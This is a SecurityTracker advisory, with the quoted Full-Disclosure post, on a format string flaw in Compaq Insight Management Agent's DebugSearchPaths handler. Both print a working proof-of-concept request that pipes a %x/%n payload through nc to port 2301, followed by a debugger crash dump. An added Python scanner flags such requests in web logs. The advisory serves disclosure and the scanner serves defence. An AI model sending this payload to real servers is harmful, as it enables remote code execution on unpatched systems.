SecurityTracker.com

SecurityTracker
Archives

Category:   Application (Generic)  >   HPE Systems Insight Manager
Vendors:   HPE
Compaq Insight Manager Format String Flaw May Let Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1007390
SecurityTracker URL:  http://securitytracker.com/id/1007390
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Aug 4 2003
Impact:   Execution of arbitrary code via network, Root access via network
Exploit Included:  Yes  
Version(s): 5.00 H
Description:   A vulnerability was reported in HP/Compaq Insight Manager. A remote user may be able to execute arbitrary code.

It is reported that there is a format string flaw in the processing of the Url parameter of DebugSearchPaths HTTP requests to the Insight Management Agent web server (TCP port 2301). According to the report, the EAX register can be overwritten with request-supplied bytes, and the server then faults on a write through that register. It may be possible for a remote user to execute arbitrary code with LocalSystem privileges [but that was not confirmed in the report].

A demonstration exploit command is provided:

$ printf "GET /<\x21.DebugSearchPaths>?Url=`perl -e 'print "A"x14'`BBBB`perl -e 'print ".%%x"x1208'`%%n> HTTP/1.0\n\n" | nc 192.168.235.131 2301
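
The request above places a `%n` write directive behind a long run of `%x` reads. As an added example (not part of the advisory or the original post), the following Python scans constructed web-server log lines for requests of that shape; the log format, the sample entries and the directive-count threshold are assumptions.

```python
import re
from urllib.parse import unquote

# Constructed sample log lines (combined-log style); not taken from the advisory.
SAMPLE_LOG = [
    '192.168.235.131 - - [04/Aug/2003:10:01:02 +0000] "GET /cpqlogin.htm HTTP/1.0" 200 1532',
    '10.0.0.7 - - [04/Aug/2003:10:02:11 +0000] "GET /<!.DebugSearchPaths>?Url=AAAAAAAAAAAAAABBBB.%x.%x.%x.%x.%x.%x%n> HTTP/1.0" 500 0',
    '10.0.0.8 - - [04/Aug/2003:10:03:00 +0000] "GET /report?Url=100%25done HTTP/1.0" 200 88',
    '10.0.0.9 - - [04/Aug/2003:10:04:30 +0000] "GET /status?Url=%x%x%x%x%x%x%x%x HTTP/1.0" 200 12',
]

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# printf-style conversion: flags, width, precision, length modifier, conversion character
DIRECTIVE_RE = re.compile(r'%[-+ 0#]*\d*(?:\.\d+)?(?:hh|h|ll|l)?([diouxXnpsc])')

# Assumed threshold: runs of %x are used to walk the stack; a stray %d in data is normal.
SUSPICIOUS_COUNT = 4


def format_directives(target):
    """Return the conversion characters found after percent-decoding the request target."""
    return DIRECTIVE_RE.findall(unquote(target))


def classify_target(target):
    """'critical' for a %n write directive, 'suspicious' for a run of read directives, else 'benign'."""
    conv = format_directives(target)
    if "n" in conv:
        return "critical"
    if len(conv) >= SUSPICIOUS_COUNT:
        return "suspicious"
    return "benign"


def scan_log(lines):
    """Return (client_ip, verdict, target) for every request line that is not benign."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        verdict = classify_target(m.group("target"))
        if verdict != "benign":
            hits.append((line.split()[0], verdict, m.group("target")))
    return hits


if __name__ == "__main__":
    for ip, verdict, target in scan_log(SAMPLE_LOG):
        print(f"{verdict:10} {ip:16} {target}")
```

The third sample line shows the edge case the decoder must survive: `%25done` decodes to a literal `%done`, which looks like a single `%d` and must not be flagged on its own.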

Impact:   A remote user may be able to execute arbitrary code with LocalSystem privileges [but that was not confirmed in the report].
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.hp.com/
Cause:   Input validation error
Underlying OS:  Windows (Any)

Message History:   None.


Source Message Contents

Subject:  [Full-Disclosure] formatstring bug in Compaq HTTP Servers


Hi there

There is a format string bug in Compaq HTTP Servers.
[in <!.DebugSearchPaths>?Url=> requests]

The HTTP server runs with LocalSystem account.

Versions:
All versions I have tested had this format string bug.

To be sure that it wasn't already fixed, I downloaded this new version.
Insight Management Agent
Version: 5.00 H (01/17/2003) 
http://www29.compaq.com/falco/sp_detail.asp?Model=4214&Div=2&Os=93&SoftwareVer=17022

Request:
$ printf "GET /<\x21.DebugSearchPaths>?Url=`perl -e 'print "A"x14'`BBBB`perl -e 'print ".%%x"x1208'`%%n> HTTP/1.0\n\n" | nc 192.168.235.131 2301

Result:
0:005> g
(9a8.934): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=42424242 ebx=0000006e ecx=000012eb edx=00000200 esi=00b440c0 edi=00000800
eip=780127a8 esp=010287f8 ebp=01028a50 iopl=0         nv up ei pl zr na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000             efl=00010246
MSVCRT!setvbuf+65d:
780127a8 8908             mov     [eax],ecx         ds:0023:42424242=????????
*** WARNING: Unable to verify checksum for C:\PROGRA~1\Compaq\COMPAQ~1\CPQWEB~1\CpqHMMO.dll
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\PROGRA~1\Compaq\COMPAQ~1\CPQWEB~1\CpqHMMO.dll - 

Have a nice day
/bashis
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Copyright 2020, SecurityGlobal.net LLC